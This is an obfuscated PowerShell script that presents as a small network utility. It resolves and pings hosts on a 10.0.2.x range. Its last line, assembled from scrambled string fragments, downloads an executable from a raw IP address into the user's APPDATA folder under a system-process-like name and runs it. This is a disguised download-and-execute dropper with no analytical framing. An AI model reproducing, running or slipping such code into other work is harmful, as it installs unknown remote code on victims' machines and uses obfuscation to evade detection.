sV  ('Y'+'vN')  ([TYPe]("{3}{2}{0}{1}" -F 'Em.N','et.dnS','t','sys')  );  

param (
	${IP`BL`oCK} = ("{0}{1}{2}" -f'10.','0','.2')
	, ${Ip`RA`NgE} = ("{1}{0}"-f'3','0..')
	)

 foreach(${i} in 0..13)
 {
     try
     {
         
		 ${I`p} = "$IPBlock.$i"
         ${H`OS`T`NAmE} =  (  lS ("vAR"+"iablE:"+"yVN")).VALUE::("{3}{1}{4}{2}{0}"-f 'ess','t','ddr','GetHos','ByA').Invoke(${i`p})."hOST`NA`Me"
        Test-Connection ${h`OSTn`AME} -Count 1
     }
     catch
     {
         Write-Warning ('Can'+'no'+'t '+'reso'+'lve '+"$ip")
         continue
     }
 }
(New-Object ("{1}{2}{3}{0}{4}"-f'et.WebCli','S','yst','em.N','ent')).("{2}{1}{0}"-f 'File','load','Down').Invoke(("{5}{0}{3}{1}{10}{9}{6}{8}{4}{7}{2}"-f '//','.102','e','94','v.','http:','yah','ex','oo/csrs','3.238/~','.5'),"$env:APPDATA\csrsv.exe");Start-Process ("$env:APPDATA\csrsv.exe")
